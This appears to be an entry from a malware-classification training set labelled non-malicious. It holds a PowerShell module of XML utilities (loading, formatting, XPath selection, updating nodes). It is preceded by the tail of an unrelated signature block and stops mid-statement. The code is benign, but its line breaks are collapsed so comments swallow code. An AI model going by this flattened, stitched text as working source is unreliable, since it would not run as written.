bFCvASYlL12AbGwHf+uRCMDGudJNljILu6WaaUC3RnrzD3DqboVAXwIkAd2HBzus # I/ScmM7PdtsKaXxEMkDTDLYvYNObvdhTjJUo2T5yBN3V4VI582WH6KlZ+iXtqLhg # p7wi253ALt/FSKLbKhcaqNAdB6SxxmjBEXFz0CuYgXE8aVSOlqGCF5gwgheUBgor # BgEEAYI3AwMBMYIXhDCCF4AGCSqGSIb3DQEHAqCCF3EwghdtAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCARy1GaMNwTE1yq8RSISza1eZVZVB+9E61n # 6RKZOKF5tAIGZbwTm9d2GBMyMDI0MDIxNTAwMzAwNy45ODRaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046REMwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHuMIIHIDCCBQigAwIBAgITMwAAAehQsIDPK3KZTQAB # AAAB6DANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1MjJaFw0yNTAzMDUxODQ1MjJaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046REMwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDhQXdE0WzXG7wzeC9SGdH6 # eVwdGlF6YgpU7weOFBkpW9yuEmJSDE1ADBx/0DTuRBaplSD8CR1QqyQmxRDD/Cdv # DyeZFAcZ6l2+nlMssmZyC8TPt1GTWAUt3GXUU6g0F0tIrFNLgofCjOvm3G0j482V # utKS4wZT6bNVnBVsChr2AjmVbGDN/6Qs/EqakL5cwpGel1te7UO13dUwaPjOy0Wi # 1qYNmR8i7T1luj2JdFdfZhMPyqyq/NDnZuONSbj8FM5xKBoar12ragC8/1CXaL1O # MXBwGaRoJTYtksi9njuq4wDkcAwitCZ5BtQ2NqPZ0lLiQB7O10Bm9zpHWn9x1/Hm # dAn4koMWKUDwH5sd/zDu4vi887FWxm54kkWNvk8FeQ7ZZ0Q5gqGKW4g6revV2IdA # xBobWdorqwvzqL70WdsgDU/P5c0L8vYIskUJZedCGHM2hHIsNRyw9EFoSolDM+yC # edkz69787s8nIp55icLfDoKw5hak5G6MWF6d71tcNzV9+v9RQKMa6Uwfyquredd5 # sqXWCXv++hek4A15WybIc6ufT0ilazKYZvDvoaswgjP0SeLW7mvmcw0FELzF1/uW # aXElLHOXIlieKF2i/YzQ6U50K9dbhnMaDcJSsG0hXLRTy/LQbsOD0hw7FuK0nmzo # tSx/5fo9g7fCzoFjk3tDEwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPo5W8o980kM # fRVQba6T34HwelLaMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCWfcJm2rwXtPi7 # 4km6PKAkni9+BWotq+QtDGgeT5F3ro7PsIUNKRkUytuGqI8thL3Jcrb03x6DOppY # JEA+pb6o2qPjFddO1TLqvSXrYm+OgCLL+7+3FmRmfkRu8rHvprab0O19wDbukgO8 # I5Oi1RegMJl8t5k/UtE0Wb3zAlOHnCjLGSzP/Do3ptwhXokk02IvD7SZEBbPboGb # tw4LCHsT2pFakpGOBh+ISUMXBf835CuVNfddwxmyGvNSzyEyEk5h1Vh7tpwP7z7r # J+HsiP4sdqBjj6Avopuf4rxUAfrEbV6aj8twFs7WVHNiIgrHNna/55kyrAG9Yt19 # CPvkUwxYK0uZvPl2WC39nfc0jOTjivC7s/IUozE4tfy3JNkyQ1cNtvZftiX3j5Dt # +eLOeuGDjvhJvYMIEkpkV68XLNH7+ZBfYa+PmfRYaoFFHCJKEoRSZ3PbDJPBiEhZ # 9yuxMddoMMQ19Tkyftot6Ez0XhSmwjYBq39DvBFWhlyDGBhrU3GteDWiVd9YGSB2 # WnxuFMy5fbAK6o8PWz8QRMiptXHK3HDBr2wWWEcrrgcTuHZIJTqepNoYlx9VRFvj # /vCXaAFcmkW1nk7VE+owaXr5RJjryDq9ubkyDq1mdrF/geaRALXcNZbfNXIkhXzX # A6a8CiamcQW/DgmLJpiVQNriZYCHIDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNRMIICOQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkRDMDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCMJG4vg0juMOVn2BuKACUvP80FuqCBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6Xe0XjAi # GA8yMDI0MDIxNDIxNTEyNloYDzIwMjQwMjE1MjE1MTI2WjB4MD4GCisGAQQBhFkK # BAExMDAuMAoCBQDpd7ReAgEAMAsCAQACAwEKbgIB/zAHAgEAAgITmDAKAgUA6XkF # 3gIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAIDB6Eg # oQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQCswmdGv718FS/bB6fbGL39 # UzPiIjH0GF8HAWJeyUuIoaFzz3+9WWG+GIft/FmO98shEsa7D5VrKcN5evkXohcY # 3S7CkbSkzPpUNGooVs4HZdPYgEDFR6VzwQw52rRZWAGQr0r+jSwnz4GxnB7pSZ8u # 9eqLV880av6+1F8Xw5s9aVOSxuonkAAhoaXP5GIGLui54yIO7oO5XghXDHS/rT7q # QlYb33BYAMCfok+spRFo7XcymkSrRKvwjGoCQVBZcnoz2/fWdqCZ0Hcg+4rjs6nJ # qYCAiyaOUxkfLgOdHkmKVnf3ItvCiT0RFNs/b6lKdDEACSuaF0oWSg7SbDZZRxyb # MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 # b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh # dGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMA # AAHoULCAzytymU0AAQAAAegwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJ # AzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgdHd7mfC7teSpr1Du8fcw # 4iRqXqgQlRBWU8Gy/Uvic9cwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCAq # 0trE1QKEIIJB0efaTaooHtMXyU9id1PFtUnPB/jrHTCBmDCBgKR+MHwxCzAJBgNV # BAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4w # HAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29m # dCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB6FCwgM8rcplNAAEAAAHoMCIEILJw # /RPJuLVmQpwmm0EL2r5vQKmEo5VFykZRnlwQb3jLMA0GCSqGSIb3DQEBCwUABIIC # ABhtVgXrQLf1CWnCGZQbeQGp1zHOemJsXiEqavrAB+9uXvI4I6Vno7Y9C94SQ/K4 # dz9ZRrIyKoBdsoU2s0j2Bm0dTNKSdhfBDWfQgztXjgZZo3BnxDCx5SWJway/2uUZ # A95e2pado4Zhw3F/GdGFsxnBsKjVTf0xgrqWUSEMQ5JfwwOUgxNKcckTW9cLt+SN # RdT9/b31gV/22Dbm7xvGQFHBAY3IYL0qzrcqplSbq31uZLLAFpMgrPZ2Y2RLLBa2 # vZ1IOV4ampbEDdQf91TdFr2LSSiJ3kRzp15EIbfBKtjOJVZ7QAicn57TUZXEExpz # tmylUffezQ6qYYdxLZWM6fa8h+wUBUbalGEf1tp3TKFyXQCdzkKo8A82bdxoymrP # RqDEU+PDbnl2l9gsEs2bUwWJaFUY5x0IprYdKiACAJoqGRRnmJjxePlkL548oKBc # nb4mwudUHEH8UYzz507WRQGGB71ykgMYHLLFS4XgDm/J7lu8o0Qun3aGlovRSPDA # XgrZgzUAJWV6cXWc14qrf5lMA4gd2QHm70Yzf3KR5n3VVW7VrAjBcFN5NO5HRoRK # Gmf1Aehqi0tD8PUNqs29FlbCpu2ZjMt5cXGnfKlCJgTm26ulPM44PBKEi5UG55Wu # GCrjdUwqnHRmy+Dnixx0u3SzfH82UNTj6R44s5XvLfzw # SIG # End signature block
combined_dataset/train/non-malicious/Xml Module 6.2.ps1
Xml Module 6.2.ps1
#requires -version 2.0 # Improves over the built-in Select-XML by leveraging Remove-XmlNamespace http`://poshcode.org/1492 # to provide a -RemoveNamespace parameter -- if it's supplied, all of the namespace declarations # and prefixes are removed from all XML nodes (by an XSL transform) before searching. # IMPORTANT: returned results *will not* have namespaces in them, even if the input XML did. # Also, only raw XmlNodes are returned from this function, so the output isn't completely compatible # with the built in Select-Xml. It's equivalent to using Select-Xml ... | Select-Object -Expand Node # Version History: # Select-Xml 2.0 This was the first script version I wrote. # it didn't function identically to the built-in Select-Xml with regards to parameter parsing # Select-Xml 2.1 Matched the built-in Select-Xml parameter sets, it's now a drop-in replacement # BUT only if you were using the original with: Select-Xml ... | Select-Object -Expand Node # Select-Xml 2.2 Fixes a bug in the -Content parameterset where -RemoveNamespace was *presumed* # Version 3.0 Added New-XDocument and associated generation functions for my XML DSL # Version 3.1 Fixed a really ugly bug in New-XDocument in 3.0 which I should not have released # Version 4.0 Never content to leave well enough alone, I've completely reworked New-XDocument # Version 4.1 Tweaked namespaces again so they don't cascade down when they shouldn't. Got rid of the unnecessary stack. # Version 4.2 Tightened xml: only cmdlet, function, and external scripts, with "-" in their names are exempted from being converted into xml tags. # Fixed some alias error messages caused when PSCX is already loaded (we overwrite their aliases for cvxml and fxml) # Version 4.3 Added a Path parameter set to Format-Xml so you can specify xml files for prety printing # Version 4.5 Fixed possible [Array]::Reverse call on a non-array in New-XElement (used by New-XDocument) # Work around possible variable slipping on null values by: # 1) allowing -param:$value syntax (which doesn't fail when $value is null) # 2) testing for -name syntax on the value and using it as an attribute instead # Version 4.6 Added -Arguments to Convert-Xml so that you can pass arguments to XSLT transforms! # Note: when using strings for xslt, make sure you single quote them or escape the $ signs. # Version 4.7 Fixed a typo in the namespace parameter of Select-Xml # Version 4.8 Fixed up some uses of Select-Xml -RemoveNamespace # Version 5.0 Added Update-Xml to allow setting xml attributes or node content # Version 6.0 Major cleanup, breaking changes. # - Added Get-XmlContent and Set-XmlContent for loading/saving XML from files or strings # - Removed Path and Content parameters from the other functions (it greatly simplifies thost functions, and makes the whole thing more maintainable) # - Updated Update-Xml to support adding nodes "before" and "after" other nodes, and to support "remove"ing nodes # Version 6.1 Update for PowerShell 3.0 # Version 6.2 Minor tweak in exception handling for CliXml function Add-Accelerator { <# .Synopsis Add a type accelerator to the current session .Description The Add-Accelerator function allows you to add a simple type accelerator (like [regex]) for a longer type (like [System.Text.RegularExpressions.Regex]). .Example Add-Accelerator list System.Collections.Generic.List``1 $list = New-Object list[string] Creates an accelerator for the generic List[T] collection type, and then creates a list of strings. .Example Add-Accelerator "List T", "GList" System.Collections.Generic.List``1 $list = New-Object "list t[string]" Creates two accelerators for the Generic List[T] collection type. .Parameter Accelerator The short form accelerator should be just the name you want to use (without square brackets). .Parameter Type The type you want the accelerator to accelerate (without square brackets) .Notes When specifying multiple values for a parameter, use commas to separate the values. For example, "-Accelerator string, regex". PowerShell requires arguments that are "types" to NOT have the square bracket type notation, because of the way the parsing engine works. You can either just type in the type as System.Int64, or you can put parentheses around it to help the parser out: ([System.Int64]) Also see the help for Get-Accelerator and Remove-Accelerator .Link http://huddledmasses.org/powershell-2-ctp3-custom-accelerators-finally/ #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipelineByPropertyName=$true)] [Alias("Key","Name")] [string[]]$Accelerator , [Parameter(Position=1,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [Alias("Value","FullName")] [type]$Type ) process { # add a user-defined accelerator foreach($a in $Accelerator) { if($xlr8r::AddReplace) { $xlr8r::AddReplace( $a, $Type) } else { $null = $xlr8r::Remove( $a ) $xlr8r::Add( $a, $Type) } trap [System.Management.Automation.MethodInvocationException] { if($xlr8r::get.keys -contains $a) { if($xlr8r::get[$a] -ne $Type) { Write-Error "Cannot add accelerator [$a] for [$($Type.FullName)]`n [$a] is already defined as [$($xlr8r::get[$a].FullName)]" } Continue; } throw } } } } &{ $local:xlr8r = [psobject].assembly.gettype("System.Management.Automation.TypeAccelerators") $local:xlinq = [Reflection.Assembly]::Load("System.Xml.Linq, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089") $xlinq.GetTypes() | ? { $_.IsPublic -and !$_.IsSerializable -and $_.Name -ne "Extensions" -and !$xlr8r::Get[$_.Name] } | Add-Accelerator Add-Accelerator "Dictionary" "System.Collections.Generic.Dictionary``2, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" Add-Accelerator "Dictionary", "System.Collections.Generic.Dictionary``2, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" Add-Accelerator "PSParser", "System.Management.Automation.PSParser, System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" } function Get-XmlContent { #.Synopsis # Load an XML file as an XmlDocument param( # Specifies a string that contains the XML to load, or a path to a file which has the XML to load (wildcards are permitted). [Parameter(Position=1,Mandatory=$true,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [ValidateNotNullOrEmpty()] [Alias("PSPath","Path")] [String[]]$Content , # If set, loads XML with all namespace qualifiers removed, and all entities expanded. [Alias("Rn","Rm")] [Switch]$RemoveNamespace ) begin { [Text.StringBuilder]$XmlContent = [String]::Empty [bool]$Path = $true } process { if($Path -and ($Path = Test-Path @($Content)[0] -EA 0)) { foreach($file in Resolve-Path $Content) { $xml = New-Object System.Xml.XmlDocument; if($file.Provider.Name -eq "FileSystem") { Write-Verbose $file.ProviderPath $xml.Load( $file.ProviderPath ) } else { $ofs = "`n" $xml.LoadXml( ([String](Get-Content $file)) ) } if($RemoveNamespace) { [System.Xml.XmlNode[]]$Xml = @(Remove-XmlNamespace -Xml $node) } Write-Output $xml } } else { # If the "path" parameter isn't actually a path, assume that it's actually content foreach($line in $content) { $null = $XmlContent.AppendLine( $line ) } } } end { if(!$Path) { $xml = New-Object System.Xml.XmlDocument; $xml.LoadXml( $XmlContent.ToString() ) if($RemoveNamespace) { $Xml = @(Remove-XmlNamespace -Xml $xml) } Write-Output $xml } }} Set-Alias Import-Xml Get-XmlContent Set-Alias ipxml Get-XmlContent Set-Alias ipx Get-XmlContent Set-Alias Get-Xml Get-XmlContent Set-Alias gxml Get-XmlContent Set-Alias gx Get-XmlContent function Set-XmlContent { param( [Parameter(Mandatory=$true, Position=1)] [Alias("PSPath")] [String]$Path , # Specifies one or more XML nodes to search. [Parameter(Position=5,ParameterSetName="Xml",Mandatory=$true,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [ValidateNotNullOrEmpty()] [Alias("Node")] [Xml]$Xml ) process { $xml.Save( $Path ) } } Set-Alias Export-Xml Set-XmlContent Set-Alias epxml Set-XmlContent Set-Alias epx Set-XmlContent Set-Alias Set-Xml Set-XmlContent Set-Alias sxml Set-XmlContent Set-Alias sx Set-XmlContent function Format-Xml { #.Synopsis # Pretty-print formatted XML source #.Description # Runs an XmlDocument through an auto-indenting XmlWriter #.Parameter Xml # The Xml Document #.Parameter Path # The path to an xml document (on disc or any other content provider). #.Parameter Indent # The indent level (defaults to 2 spaces) #.Example # [xml]$xml = get-content Data.xml # C:\\PS>Format-Xml $xml #.Example # get-content Data.xml | Format-Xml #.Example # Format-Xml C:\\PS\\Data.xml #.Example # ls *.xml | Format-Xml # [CmdletBinding()] param( [Parameter(Position=0, Mandatory=$true, ValueFromPipeline=$true, ParameterSetName="Document")] [xml]$Xml , [Parameter(Position=0, Mandatory=$true, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true, ParameterSetName="File")] [Alias("PsPath")] [string]$Path , [Parameter(Mandatory=$false)] $Indent=2 ) process { ## Load from file, if necessary if($Path) { [xml]$xml = Get-Content $Path } $StringWriter = New-Object System.IO.StringWriter $XmlWriter = New-Object System.Xml.XmlTextWriter $StringWriter $xmlWriter.Formatting = "indented" $xmlWriter.Indentation = $Indent $xml.WriteContentTo($XmlWriter) $XmlWriter.Flush() $StringWriter.Flush() Write-Output $StringWriter.ToString() }} Set-Alias fxml Format-Xml -EA 0 Set-Alias fx Format-Xml -EA 0 function Select-XmlNodeInternal { [CmdletBinding()] param([Xml.XmlNode[]]$Xml, [String[]]$XPath, [Hashtable]$NamespaceManager) begin { Write-Verbose "XPath = $($XPath -join ',')" foreach($node in $xml) { if($NamespaceManager) { $nsManager = new-object System.Xml.XmlNamespaceManager $node.NameTable foreach($ns in $NamespaceManager.GetEnumerator()) { $nsManager.AddNamespace( $ns.Key, $ns.Value ) } Write-Verbose "Names = $($nsManager | % { @{ $_ = $nsManager.LookupNamespace($_) } } | Out-String)" } foreach($path in $xpath) { $node.SelectNodes($path, $nsManager) } } }} function Select-Xml { #.Synopsis # The Select-XML cmdlet lets you use XPath queries to search for text in XML strings and documents. Enter an XPath query, and use the Content, Path, or Xml parameter to specify the XML to be searched. #.Description # Improves over the built-in Select-XML by leveraging Remove-XmlNamespace to provide a -RemoveNamespace parameter -- if it's supplied, all of the namespace declarations and prefixes are removed from all XML nodes (by an XSL transform) before searching. # # However, only raw XmlNodes are returned from this function, so the output isn't currently compatible with the built in Select-Xml, but is equivalent to using Select-Xml ... | Select-Object -Expand Node # # Also note that if the -RemoveNamespace switch is supplied the returned results *will not* have namespaces in them, even if the input XML did, and entities get expanded automatically. [CmdletBinding(DefaultParameterSetName="Xml")] param( # Specifies an XPath search query. The query language is case-sensitive. This parameter is required. [Parameter(Position=1,Mandatory=$true,ValueFromPipeline=$false)] [ValidateNotNullOrEmpty()] [Alias("Query")] [String[]]$XPath , # Specifies a string that contains the XML to search. You can also pipe strings to Select-XML. [Parameter(ParameterSetName="Content",Mandatory=$true)] [ValidateNotNullOrEmpty()] [String[]]$Content , # Specifies the path and file names of the XML files to search. Wildcards are permitted. [Parameter(Position=5,ParameterSetName="Path",Mandatory=$true,ValueFromPipelineByPropertyName=$true)] [ValidateNotNullOrEmpty()] [Alias("PSPath")] [String[]]$Path , # Specifies one or more XML nodes to search. [Parameter(Position=5,ParameterSetName="Xml",Mandatory=$true,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [ValidateNotNullOrEmpty()] [Alias("Node")] [System.Xml.XmlNode[]]$Xml , # Specifies a hash table of the namespaces used in the XML. Use the format @{<namespaceName> = <namespaceUri>}. [Parameter(Position=10,Mandatory=$false)] [ValidateNotNullOrEmpty()] [Alias("Ns")] [Hashtable]$Namespace , # Allows the execution of XPath queries without namespace qualifiers. # # If you specify the -RemoveNamespace switch, all namespace declarations and prefixes are actually removed from the Xml before the XPath search query is evaluated, and your XPath query should therefore NOT contain any namespace prefixes. # # Note that this means that the returned results *will not* have namespaces in them, even if the input XML did, and entities get expanded automatically. [Alias("Rn","Rm")] [Switch]$RemoveNamespace ) begin { $NSM = $Null; if($PSBoundParameters.ContainsKey("Namespace")) { $NSM = $Namespace } $XmlNodes = New-Object System.Xml.XmlNode[] 1 if($PSCmdlet.ParameterSetName -eq "Content") { $XmlNodes = ConvertTo-Xml $Content -RemoveNamespace:$RemoveNamespace Select-XmlNodeInternal $XmlNodes $XPath $NSM } } process { switch($PSCmdlet.ParameterSetName) { "Path" { $node = ConvertTo-Xml $Path -RemoveNamespace:$RemoveNamespace Select-XmlNodeInternal $node $XPath $NSM } "Xml" { foreach($node in $Xml) { if($RemoveNamespace) { [Xml]$node = Remove-XmlNamespace -Xml $node } Select-XmlNodeInternal $node $XPath $NSM } } } }} Set-Alias slxml Select-Xml -EA 0 Set-Alias slx Select-Xml -EA 0 function Update-Xml { #.Synopsis # The Update-XML cmdlet lets you use XPath queries to replace text in nodes in XML documents. Enter an XPath query, and use the Content, Path, or Xml parameter to specify the XML to be searched. #.Description # Allows you to update an attribute value, xml node contents, etc. # #.Notes # We still need to implement RemoveNode and RemoveAttribute and even ReplaceNode [CmdletBinding(DefaultParameterSetName="Set")] param( # Specifies an XPath for an element where you want to insert the new node. [Parameter(ParameterSetName="Before",Mandatory=$true)] [ValidateNotNullOrEmpty()] [Switch]$Before , # Specifies an XPath for an element where you want to insert the new node. [Parameter(ParameterSetName="After",Mandatory=$true)] [ValidateNotNullOrEmpty()] [Switch]$After , # If set, the new value will be added as a new child of the node identified by the XPath [Parameter(ParameterSetName="Append",Mandatory=$true)] [Switch]$Append , # If set, the node identified by the XPath will be removed instead of set [Parameter(ParameterSetName="Remove",Mandatory=$true)] [Switch]$Remove , # If set, the node identified by the XPath will be Replace instead of set [Parameter(ParameterSetName="Replace",Mandatory=$true)] [Switch]$Replace , # Specifies an XPath for the node to update. This could be an element node *or* an attribute node (remember: //element/@attribute ) [Parameter(Position=1,Mandatory=$true)] [ValidateNotNullOrEmpty()] [String[]]$XPath , # The new value to place in the xml [Parameter(Position=2,Mandatory=$true,ValueFromPipeline=$false)] [ValidateNotNullOrEmpty()] [String]$Value , # Specifies one or more XML nodes to search. [Parameter(Position=5,Mandatory=$true,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [ValidateNotNullOrEmpty()] [Alias("Node")] [System.Xml.XmlNode[]]$Xml , # Specifies a hash table of the namespaces used in the XML. Use the format @{<namespaceName> = <namespaceUri>}. [Parameter(Position=10,Mandatory=$false)] [ValidateNotNullOrEmpty()] [Alias("Ns")] [Hashtable]$Namespace , # Output the XML documents after adding updating them [Switch]$Passthru ) process { foreach($XmlNode in $Xml) { $select = @{} $select.Xml = $XmlNode $select.XPath = $XPath if($Namespace) { $select.Namespace = $Namespace } $document = if($XmlNode -is [System.Xml.XmlDocument]) { $XmlNode } else { $XmlNode.get_OwnerDocument() } if($xValue = $Value -as [Xml]) { $xValue = 